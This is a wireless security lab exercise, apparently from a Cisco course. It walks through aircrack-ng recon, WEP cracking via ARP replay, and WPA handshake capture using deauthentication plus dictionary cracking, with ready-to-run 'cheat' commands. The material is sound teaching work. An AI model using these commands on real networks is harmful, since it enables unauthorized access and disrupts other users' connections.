Hacking Wireless Networks

IMPORTANT!: Gaining access to networks without permission is considered an illegal act or crime in most countries. Know the law and obey.

Aircrack-ng http://www.aircrack-ng.org/ is a set of tools for auditing wireless networks. The goal of these exercises is to introduce some of their capabilities. The man pages are very thorough and are more than enough to complete the exercises without “cheating”. You are encouraged to find the solutions in the man pages. Please pay attention to the large variety of features the toolset offers as we will only be able to cover a tiny fraction.

You will need to be root to use most of these utilities.

Exercise 1: Recon

Task 1

Use airodump-ng to find our targets’ BSSIDs, channels, and security settings given their ESSIDs: seccon_wep and seccon_wpa. Make note of these details, you will need them later. Stop the process when you are done.

In order to sniff a wireless network, the adapter needs to be put into monitor mode. Some processes may interfere with the adapter while in monitor mode.

Airmon Check
1 
airmon-ng check

List the processes that may interfere. It is best to kill those in normal testing. Do not kill any processes for this lab (e.g. dhclient & wpa_supplicant).

Killing conflicting processes
1 
airmon-ng check kill

This command would kill potentially interfering processes, but don’t use it for this lab.

Put the wireless interface wlan0 in monitor mode. A new interface wlan0mon0 will be created. Automatically correct any errors noted.

Configuring the wireless interface wlan0 in monitor mode.
1 
airmon-ng start wlan0

Use airodump-ng. Note: “Copy” might be broken for this command, as the double-dashes don’t get copied properly.

Using airodump-ng
1 
airodump-ng –essid seccon_wep –essid seccon_wpa wlan0mon

Exercise 2 : Cracking WEP

Task 1

Run airodump-ng to start capturing packets on the target network utilizing WEP. Let this capture continue.

+ Click here for Cheat 
    airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon

Task 2

Use aircrack-ng PTW (Pyshkin, Tews, Weinmann) method to crack the WEP PSK.

+ Click here for Cheat 
       # -a 1 specifies we are cracking WEP
       aircrack-ng -a 1 [-b $target_bssid] $capture_file

Task 3

Anywhere from 20k-60k IVs will be needed. Use aireplay-ng to spoof an associated station and replay ARP frames to increase the data rate.

+ Click here for Cheat 
      # -3 indicates replay ARP frames
      aireplay-ng -3 -b $target_bssid -h $spoofed_station_mac wlan0mon

Exercise 3 : Obtaining the WPAv2 PSK

Task 1

Use airodump-ng to capture a WPA handshake corresponding to a target network.

+ Click here for Cheat 
      # Wait until the WPA handshake appears in the top line.
      airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon

Task 2

If the handshake doesn’t reveal itself passively, use aireplay-ng to deauthenticate an associated station. This will force a handshake to occur.

+ Click here for Cheat 
       # -0 1 indicates send one set of deauth packets
       aireplay-ng -0 1 -a $target_bssid -c $authed_station_mac wlan0mon

Task 3

Use aircrack-ng to find the WPA PSK using the dictionary /usr/share/wordlists/fasttrack.txt.

+ Click here for Cheat 
      # -a 2 specifies we are looking for a WPA handshake
      aircrack-ng -a 2 [-b $target_bssid] -w /usr/share/wordlists/fasttrack.txt $handshake_capture_file
© Copyright Cisco Systems